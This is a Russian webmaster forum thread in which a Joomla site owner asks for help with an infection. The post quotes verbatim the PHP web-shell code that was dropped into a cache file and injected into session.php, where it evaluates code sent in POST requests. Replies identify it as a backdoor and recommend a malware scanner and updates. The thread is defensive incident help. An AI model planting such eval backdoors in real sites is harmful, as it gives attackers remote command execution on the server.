- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день.
Похоже откопали уязвимость на сайте (Joomla), сказывается следующим образом:
в произвольной папке сайта появляется файлик с названием cache.uniq_ххххх.php, где xxxxx какое-то число. Содержимое самого файла
<?php if(isset($_POST["php"])){@eval(stripslashes($_POST["php"]));};?>Одновременно с этим в файл session.php по пути \public_html\libraries\joomla\session
в самое начала добавляются строки
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
Пока чищу ручками, не смейтесь, ибо дыра не найдена. Но хотелось бы понять, что эта зараза делает.
Это шелл, выполняет любые команды задавыемые злоумышленником при удаленном обращении к этому файлу (от имени пользователя веб-сервера).
Sergsap, Пройдитесь по сайту Ai-Bolitом это будет в разы быстрее чем руками да и руками не все найдете.
Спасибо за помощь. Айболит сообщил про дыру как раз в этом файле. Ну и плюс еще много пищи для размышлений на досуге подкинул :).
Sergsap, Скорее всего это бекдор в этом файле, а не дыра. Так что юзайте внимательней...
Да, это я неправильно выразился в силу незнания подобных терминов.
Айболит сообщил об уязвимости в этом скрипте и еще в одном. С первым просто, ибо проблема широкая, со вторым не очевидно для меня по крайней мере.
Речь о строчке
в administrator/components/com_rsform/helpers/rsform.php
Тут обсуждают проблему, дальше есть проверялки на уязвимость, проверил сайт, вроде пишут норм.
Еще Айболит выдал предупреждения на несколько скриптов с "iframe", вот думаю как их вырезать, чтобы лишнего не оттяпать). Одна такая вставка
чтобы лишнего не оттяпать)
Если оттяпаете, всегда можно вернуть)) Ищите уязвимость в CMS, шаблоне, модулях. Обновите их всех до последних версий.
Sergsap, не нужно удалять ни первый ни второй кусок кода.
Это не вредоносный код, а часть рабочего кода, которая и была изначально написана разработчиками соответствующих дополнений.
Враги спрятались в другом месте! :-)
Ну не знаю, как только удалил, все стало нормально :). Значит не такой уж и нужный рабочий код :)